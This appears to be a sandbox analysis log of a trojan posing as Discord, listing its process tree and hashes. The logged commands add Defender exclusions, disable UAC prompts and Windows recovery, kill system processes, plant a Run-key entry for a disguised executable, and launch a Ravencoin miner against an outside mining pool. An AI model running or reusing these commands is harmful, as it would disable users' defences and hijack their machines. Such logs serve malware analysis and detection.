C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exeC:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\discord\Crashpad --url=https://sentry.io/api/146342/minidump/?sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord Inc." --annotation=_productName=Discord --annotation=_version=1.0.9008 --annotation=prod=Electron --annotation=ver=13.6.6 --initial-client-data=0x480,0x484,0x488,0x478,0x48c,0x7a83850,0x7a83860,0x7a8386c4⤵
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=gpu-process --field-trial-handle=1788,117256936981162093,7708363884705835752,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1792 /prefetch:24⤵
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1788,117256936981162093,7708363884705835752,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2360 /prefetch:14⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1788,117256936981162093,7708363884705835752,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:84⤵
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1788,117256936981162093,7708363884705835752,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1 --enable-node-leakage-in-renderers4⤵
- Checks computer location settings
- Drops startup file
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /q /d /s /c "C:\Program^ Files\NVIDIA^ Corporation\NVSMI\nvidia-smi.exe"5⤵
-
-
C:\Windows\SysWOW64\net.exenet session5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:LOCALAPPDATA -Force"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:LOCALAPPDATA -Force6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powercfg /hibernate off"5⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"5⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reagentc.exe /disable"5⤵
-
C:\Windows\SysWOW64\ReAgentc.exereagentc.exe /disable6⤵
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:APPDATA -Force"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im SoundServices.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SoundServices.exe6⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" /t REG_SZ /d "RUNASADMIN" /f"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im dllhost.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dllhost.exe6⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im taskhostw.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskhostw.exe6⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im SearchApplication.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SearchApplication.exe6⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dasHost" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Microsoft\MicrosoftAudio.exe""5⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dasHost" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Microsoft\MicrosoftAudio.exe"6⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\Espeon.zip -DestinationPath C:\Users\Admin\AppData\Roaming\Microsoft -Force"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\Espeon.zip -DestinationPath C:\Users\Admin\AppData\Roaming\Microsoft -Force6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\ErrorReport.exe --algo rvn --server us-rvn.2miners.com:6060 --user RCHpqCzug51LY7XURL9bS6yqBwipcxYXmb.Admin"5⤵
-
C:\Users\Admin\AppData\Local\Temp\ErrorReport.exeC:\Users\Admin\AppData\Local\Temp\ErrorReport.exe --algo rvn --server us-rvn.2miners.com:6060 --user RCHpqCzug51LY7XURL9bS6yqBwipcxYXmb.Admin6⤵
-
C:\Users\Admin\AppData\Local\Temp\ErrorReport.exe"C:\Users\Admin\AppData\Local\Temp\ErrorReport.exe" --algo rvn --server us-rvn.2miners.com:6060 --user RCHpqCzug51LY7XURL9bS6yqBwipcxYXmb.Admin --watchdog_child_process07⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1788,117256936981162093,7708363884705835752,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3588 /prefetch:84⤵
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1788,117256936981162093,7708363884705835752,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3572 /prefetch:84⤵
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord4⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord /d "C:\Users\Admin\AppData\Local\Discord\Update.exe --processStart Discord.exe" /f4⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=gpu-process --field-trial-handle=1788,117256936981162093,7708363884705835752,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2996 /prefetch:24⤵
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4fc 0x3a01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5664_947569214\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5664_947569214\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={8d4f0224-a25c-465e-b872-f88a5d87e1ad} --system2⤵
- Executes dropped EXE
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f1⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\ReAgentc.exereagentc.exe /disable1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:LOCALAPPDATA -Force1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f1⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:APPDATA -Force1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Everything\Everything.exe"C:\Program Files (x86)\Everything\Everything.exe" -svc1⤵
- Executes dropped EXE
-
C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
-
C:\Windows\system32\certutil.exe"C:\Windows\system32\certutil.exe" -f -addstore root "C:\Windows\TEMP\MBInstallTempbcfd6ec47fcb11ed83d24a8324823cc0\servicepkg\starfieldrootcag2_new.crt"2⤵
- Modifies data under HKEY_USERS
-
-
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Registers COM server for autorun
- Drops file in System32 directory
- Modifies registry class
-
-
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Registers COM server for autorun
- Sets service image path in registry
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe"C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe" --showdashboard3⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe"C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe" --showdashboard3⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe"C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe" --showdashboard3⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe"C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe" --showdashboard3⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\malwarebytes_assistant.exe"C:\Program Files\Malwarebytes\Anti-Malware\malwarebytes_assistant.exe" --stopservice3⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-0.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-1.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-2.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-3.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-4.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-5.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-6.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-7.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-8.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-9.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-10.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-11.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-12.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-13.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-14.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-15.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-16.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-17.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-18.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-19.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-20.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-21.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-22.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-23.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-24.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-25.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-26.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-27.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-28.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-29.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-30.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-31.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-32.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-33.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-34.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-35.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-36.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-37.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-38.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-39.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-40.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-41.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-42.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-43.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-44.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-45.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-46.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-47.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-48.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-49.exeig.exe reseed2⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe"C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe" /wac 0 /status off true /updatesubstatus none /scansubstatus recommended /settingssubstatus none2⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4fc 0x3a01⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f1⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:APPDATA -Force1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 432 -p 2844 -ip 28442⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 2844 -ip 28442⤵
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
MD5d2bf47a560d847467660957ce6364a90
SHA110ea8183c20f9a10f8708c51986b98d0498ffaa3
SHA25650ecc97068fe6c8df47c366dd69cb67e868107548f0d348bc49c8b4466f786a1
